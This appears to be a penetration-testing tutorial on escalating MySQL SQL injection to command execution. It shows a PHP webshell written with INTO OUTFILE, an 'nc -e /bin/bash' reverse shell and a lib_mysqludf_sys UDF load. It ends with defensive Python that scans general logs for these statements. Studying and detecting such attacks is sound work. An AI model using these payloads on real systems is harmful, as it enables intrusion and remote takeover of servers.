Webshell and UDF

Method 1: Webshell

If we have file-write permission (MySQL's FILE privilege), we can combine a UNION-based injection with INTO OUTFILE to create a PHP webshell on the target system:

SELECT username,password FROM users WHERE id = '1' UNION SELECT 1,'<?php system($_GET["cmd"]);?>' INTO OUTFILE '/var/www/html/images/webshell.php';

Here we choose the images directory since it is usually owned by the www-data user, not root.

Once the webshell is created successfully, we can spawn a netcat reverse shell. Start a listener on our local machine:

nc -nvlp 443

Spawn a netcat reverse shell using the webshell:

http://127.0.0.1/images/webshell.php?cmd=nc -e /bin/bash <local_ip> 443

Method 2: UDF

The UDF library lib_mysqludf_sys provides the following dangerous functions:

  • sys_eval(): executes any command and returns the result

  • sys_exec(): executes any command and returns the return code

  • sys_get(): gets an environment variable

  • sys_set(): creates or modifies an environment variable

MySQL does not ship this library by default, so lib_mysqludf_sys has to be loaded into the server before these functions can be used. sqlmap bundles a cloaked copy of the library; decode it into a usable binary with cloak.py:

cd sqlmap/extra/cloak
python3 cloak.py -d -i ../../data/udf/mysql/linux/32/lib_mysqludf_sys.so_ -o lib_mysqludf_sys.so

Grab its content as hex:

xxd -ps lib_mysqludf_sys.so

Connect to MySQL. In the MySQL shell, paste the hex data into unhex() and write the result into the plugin directory:

SELECT unhex('<hex_data_in_lib_linux.so>') INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';

Here we use DUMPFILE instead of OUTFILE, since DUMPFILE writes the value as an unmodified binary file while OUTFILE adds newlines and escapes some special characters.

Register the sys_eval() function from lib_mysqludf_sys.so:

CREATE FUNCTION sys_eval RETURNS STRING SONAME "lib_mysqludf_sys.so";

At this stage we can execute arbitrary commands (as the user the MySQL server runs as) through the sys_eval() function:

SELECT sys_eval('id');
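Both methods leave distinctive statements in the MySQL general log, and both are gated by the server's secure_file_priv setting. The following Python is an added example (not from the original page) that scans constructed general-log lines for the INTO OUTFILE / INTO DUMPFILE writes, the CREATE FUNCTION ... SONAME registration and the sys_* calls used above, and classifies a secure_file_priv value; the log lines are constructed sample data, not captured traffic.

```python
import re

# Constructed sample of MySQL general-log "Query" lines (not real captured data):
# the statements discussed above, plus one benign statement that merely quotes a keyword.
SAMPLE_LOG = """\
2024-01-01T10:00:01.000000Z\t  12 Query\tSELECT username,password FROM users WHERE id = '1'
2024-01-01T10:00:02.000000Z\t  12 Query\tSELECT 1,'<?php ... ?>' INTO OUTFILE '/var/www/html/images/webshell.php'
2024-01-01T10:00:03.000000Z\t  13 Query\tSELECT unhex('7f454c46') INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so'
2024-01-01T10:00:04.000000Z\t  13 Query\tCREATE FUNCTION sys_eval RETURNS STRING SONAME "lib_mysqludf_sys.so"
2024-01-01T10:00:05.000000Z\t  13 Query\tSELECT sys_eval('id')
2024-01-01T10:00:06.000000Z\t  14 Query\tSELECT id FROM notes WHERE body = 'wrote it into outfile'
"""

# General log entry: <timestamp> <connection id> Query <statement>
LOG_LINE = re.compile(r"^\S+\s+(\d+)\s+Query\s+(.*)$")
# Single- or double-quoted SQL string literals (with backslash escapes).
LITERAL = re.compile(r"'(?:[^'\\]|\\.)*'|\"(?:[^\"\\]|\\.)*\"")
# Detection rules; keywords are matched case-insensitively, as MySQL parses them.
RULES = [
    ("file_write_outfile", re.compile(r"\bINTO\s+OUTFILE\b", re.I)),
    ("file_write_dumpfile", re.compile(r"\bINTO\s+DUMPFILE\b", re.I)),
    ("udf_register_soname", re.compile(r"\bCREATE\s+FUNCTION\b.*\bSONAME\b", re.I)),
    ("udf_sys_call", re.compile(r"\bsys_(?:eval|exec|get|set)\s*\(", re.I)),
]

def scan_general_log(text):
    """Return (connection_id, rule_name, statement) per rule hit. Literals are
    blanked first so a keyword quoted inside data is not a false positive."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        conn_id, statement = int(m.group(1)), m.group(2)
        blanked = LITERAL.sub("''", statement)
        for name, pattern in RULES:
            if pattern.search(blanked):
                hits.append((conn_id, name, statement))
    return hits

def secure_file_priv_status(value):
    """Classify secure_file_priv (SHOW VARIABLES LIKE 'secure_file_priv'): NULL
    disables INTO OUTFILE/DUMPFILE, '' allows writes anywhere the server user can,
    and a directory path confines them to that directory."""
    if value is None or value.strip().upper() == "NULL":
        return "disabled"
    if value.strip() == "":
        return "unrestricted"
    return "restricted"
```

Several hits from one connection id within seconds (a DUMPFILE write into plugin_dir followed by CREATE FUNCTION ... SONAME) is the sequence worth alerting on, and an "unrestricted" secure_file_priv is the setting to fix.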
